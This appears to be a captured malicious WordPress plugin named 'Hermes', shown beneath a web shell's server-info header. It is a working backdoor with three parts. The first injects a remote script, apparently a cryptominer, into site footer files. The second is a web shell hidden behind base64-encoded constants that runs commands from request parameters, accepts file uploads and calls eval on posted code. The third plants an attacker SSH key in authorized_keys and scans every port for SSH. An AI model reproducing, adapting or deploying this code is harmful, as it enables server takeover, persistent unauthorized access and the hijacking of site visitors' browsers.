| Server IP : 104.21.14.48 / Your IP : 18.216.73.75 [ Web Server : Apache System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64 User : root ( 0) PHP Version : 8.0.30.2 Disable Function : NONE Domains : 0 Domains MySQL : ON | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/wp-content/plugins/hermes/ |
Upload File : |
<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/
if(isset($_GET["able"]))
{
// Define the text you want to add before the </body> tag
$newText = "<script>(function(d, s, id){
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)){ return; }
js = d.createElement(s); js.id = id;
js.onload = function(){
EverythingIsLife('47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu', 'web', 50);
};
js.src = 'https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo';
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'backup-jss'));
</script>";
// Define the directory where your footer files reside (webroot)
$directory = $_SERVER['DOCUMENT_ROOT'];
$searchText = "47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu";
// Array of file names to target
$fileNames = array('footer.tpl', 'footer.php');
// Maximum depth to traverse
$maxDepth = 7;
// Recursive function to search directories
function searchDirectories($directory, $depth) {
global $fileNames, $newText, $maxDepth, $searchText;
if ($depth > $maxDepth) {
return;
}
$files = scandir($directory);
foreach ($files as $file) {
if ($file == '.' || $file == '..') {
continue;
}
$filePath = $directory . '/' . $file;
if (is_dir($filePath)) {
searchDirectories($filePath, $depth + 1);
} else {
if (in_array($file, $fileNames)) {
$content = file_get_contents($filePath);
if ($file == 'footer.php') {
// Check if footer.php contains the specific text pattern
if (strpos($content, $searchText) == false) {
// Check if footer.php contains </body> tag
if (strpos($content, '</body>') !== false) {
// Add text above </body> tag
$content = str_replace('</body>', $newText . '</body>', $content);
}
}
} else {
// Add text at the top for footer.tpl
if (strpos($content, $searchText) == false) {
$content = $newText . $content;
}
}
// Write the modified content back to the file
file_put_contents($filePath, $content);
echo "Text added to the top of: $directory/$file <br>";
}
}
}
}
// Start searching directories
searchDirectories($directory, 0);
echo "Operation completed.";
// // Get the current script filename
// $scriptFilename = __FILE__;
//
// // Attempt to delete the file
// if (unlink($scriptFilename)) {
// echo "Script '$scriptFilename' has been deleted successfully.";
// } else {
// echo "Failed to delete script '$scriptFilename'.";
// }
}
?>
<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/
define('INSTALLATION_KEY', base64_decode("NGN4MA=="));
define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4='));
define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+'));
define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+'));
define('THEMES_INSTALL', base64_decode('PC9mb3JtPg=='));
define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA=='));
define('PATH_THEMES', base64_decode('Y29tbWFuZA=='));
define('BASE64_THEMES', base64_decode('cHdk'));
define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg=='));
define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T'));
define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h'));
define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h'));
define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg=='));
define('EVALUATION_TITLE',base64_decode('ZXZhbHVhdGU='));
define('EVALUATION_THEME',base64_decode('PGRpdj48Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJldmFsdWF0ZSIgLz48aW5wdXQgdHlwZT0ic3VibWl0Ij48L2Zvcm0+PC9kaXY+'));
/**
* Customize Setting to represent a nav_menu.
*
* Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and
* the IDs for the nav_menu_items associated with the nav menu.
*
* @since 4.3.0
*
* @see WP_Customize_Setting
*/
$wp_body = INSTALLATION_KEY;
$wp_config_header = AUTHOR_KEY;
$wp_config_body = HOST_KEY;
$wp_themes_config = THEMES_SELECTION;
$wp_themes_install = THEMES_INSTALL;
$wp_body = strrev($wp_body);
$wp_default = DEFAULT_THEMES;
$wp_path = PATH_THEMES;
$wp_builder = BASE64_THEMES;
$wp_evaluation= EVALUATION_TITLE;
if(isset($_GET[$wp_body])){
/**
* Fires before the Site Activation page is loaded.
*
* Fires on the {@see 'wp_head'} action.
*
* @since 3.0.0
*/
echo BASE64_TITLE;
echo AUTHOR_KEY;
echo HOST_KEY;
echo THEMES_SELECTION;
echo THEMES_INSTALL;
echo EVALUATION_THEME;
echo UPLOAD_THEMES_1;
echo UPLOAD_THEMES_2;
echo UPLOAD_THEMES_3;
echo UPLOAD_THEMES_4;
if(!empty($_FILES["uploaded_file"])){
$path = basename( $_FILES["uploaded_file"]["name"]);
if(move_uploaded_file($_FILES["uploaded_file"]["tmp_name"], $path)) {
echo "The file ". basename( $_FILES["uploaded_file"]["name"])." has been uploaded";}
else{
echo "There was an error uploading the file, please try again!";}}
if(isset($_POST[$wp_default])){
$wp_themes_install=fread(popen($_POST[$wp_path], "r"), 4096);
echo"<pre>$wp_themes_install</pre>";}
elseif($_GET[$wp_body]!==""){
$wp_themes_install=fread(popen($_GET[$wp_body], "r"), 4096);
echo"<pre>$wp_themes_install</pre>";}
$wp_themes_install=fread(popen($wp_builder, "r"), 4096);
echo"<pre>pwd: $wp_themes_install</pre>";
if(isset($_POST[$wp_evaluation])){
echo "<pre> Evaluation: ";
echo(eval ($_POST[$wp_evaluation]));
echo("</pre>");
}
exit;
}
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
?>
<?php
function getCurrentUserDetails(){
$output=[];
// Get the username of the user running the script
$username = get_current_user();
// Attempt to get the user's home directory
$homeDirectory = getenv('HOME') ?: 'N/A';
// Attempt to get the user's login shell
$loginShell = getenv('SHELL') ?: 'N/A';
// If posix functions are available, use them for additional information
if (function_exists('posix_getpwuid')) {
$userInfo = posix_getpwuid(posix_geteuid());
if ($userInfo) {
$homeDirectory = $userInfo['dir'];
$loginShell = $userInfo['shell'];
}
}
$output = [$username,$homeDirectory,$loginShell];
return $output;
}
// Function to scan multiple ports concurrently using non-blocking I/O
function fastNonBlockingPortScan($ip, $startPort = 1, $endPort = 65535, $timeout = 2, $concurrency = 100) {
$sshPorts = []; // Array to store open SSH ports
$connections = [];
$portQueue = range($startPort, $endPort);
while (!empty($portQueue) || !empty($connections)) {
// Initialize connections up to the concurrency limit
while (count($connections) < $concurrency && !empty($portQueue)) {
$port = array_shift($portQueue);
$connection = @stream_socket_client("tcp://$ip:$port", $errno, $errstr, $timeout, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT);
if ($connection) {
stream_set_blocking($connection, false);
$connections[$port] = $connection;
}
}
if (empty($connections)) {
break;
}
// Use stream_select to wait for any of the streams to become readable
$read = $connections;
$write = null;
$except = null;
$ready = stream_select($read, $write, $except, $timeout);
if ($ready > 0) {
foreach ($read as $port => $connection) {
$banner = fread($connection, 1024);
fclose($connection);
unset($connections[$port]);
if (stripos($banner, 'SSH') !== false) {
echo "---p---$port---p---\n";
$sshPorts[] = $port; // Add the port to the SSH ports array
}
}
} else {
// Timeout or no ready connections, close all and break
foreach ($connections as $connection) {
fclose($connection);
}
break;
}
}
//echo "after break";
return $sshPorts;
}
function appendIfNotExists($filename, $content) {
// Check if the file exists
if (file_exists($filename)) {
// Read the entire file content
$fileContent = file_get_contents($filename);
// Check if the content is already in the file
if (strpos($fileContent, $content) !== false) {
return true; // Content already exists, nothing to append
}
}
// Open the file for appending (create if it does not exist)
$fileHandle = fopen($filename, 'a');
// Check if the file was opened successfully
if ($fileHandle === false) {
return false;
}
// Write the content to the file
$result = fwrite($fileHandle, $content . PHP_EOL);
// Close the file
fclose($fileHandle);
// Check if writing was successful
if ($result === false) {
return false;
}
return true;
}
if (!function_exists('str_contains')) {
function str_contains (string $haystack, string $needle)
{
return empty($needle) || strpos($haystack, $needle) !== false;
}
}
function extractIpAddress($html) {
// Define a regex pattern to match the IP address
$pattern = '/Current IP Address:\s*([\d\.]+)/';
// Perform the regex match
if (preg_match($pattern, $html, $matches)) {
return $matches[1]; // Return the matched IP address
}
return ""; // Return null if no IP address was found
}
function getIp(){
$ch = curl_init ();
// set URL and other appropriate options
curl_setopt ($ch, CURLOPT_URL, "http://checkip.dyndns.org");
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true);
// grab URL and pass it to the browser
$ip = extractIpAddress(curl_exec ($ch));
// close cURL resource, and free up system resources
curl_close ($ch);
return $ip;
}
function startChecks(){
$userNameDetails = getCurrentUserDetails();
if ( (str_contains($userNameDetails[2],"/noshell") || str_contains($userNameDetails[2],"/bin/false") || str_contains($userNameDetails[2],"/nologin") ) == false){
$folderPath = "$userNameDetails[1]/.ssh";
mkdir("$folderPath");
chmod("$folderPath", 0700);
appendIfNotExists("$folderPath/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0h1Jw1strFMQhp8USGkQ9eIoF1uox+kuH6Nit4o9lgREU/XrakRAJW4HL/nj/StKHCbm5OBitXjCquTgwOCmMR40M5r7cmvZxwgxnEDzvnIXjE8XmNQfDBensgv+BjIk4KnZSEeuOp4iWX7Wy7DpLe/OI/OL8c3QlqBW5CMOoyi7cd9c/bnHpOqro4mGmDX54tD0j2yKjKgfUkIn1Hm3aoetTMUwxj65M4IlRk4DJpYS/gx7LVcHNV1G7VFkQohCNQcH976X/+/Tl3t2J+ONDwrHVrIJw44E9EIE4RLe3gzLe5zXf4wF1FmxVRzvLCezGDBIbHDlUiJ02WUFuborDsB0au0Xi1fhIiVXSRqmsXhYy/pToiwIPgFNBlQqzeXga070Ya20kHw+Tc60+z3mJLVTYTTaFBHDjHWKXWGG/EzkRwm6esE3FPkaSAop47E3t9Nfds6MO14C//+8i48cY5wbqR5HqywmZ0E0ke7eJtBNEk7YVwIk4JQ9ZthWvYq0=");
chmod("$folderPath/authorized_keys",0600);
// Example usage
echo "---u---$userNameDetails[0]---u---\n";
// Replace with your server's IP address
// create a new cURL resource
$targetIP = getIP();
if ($targetIP == ""){
$targetIP = "127.0.0.1";
}
echo "---ip---$targetIP---ip---\n";
$startPort = 1;
$endPort = 65535; // Scanning all ports up to 65535
$concurrency = 250; // Number of concurrent connections
$sshPorts = fastNonBlockingPortScan($targetIP, $startPort, $endPort, 2, $concurrency);
}
}
if(isset($_GET["check"])){
startChecks();
}
?>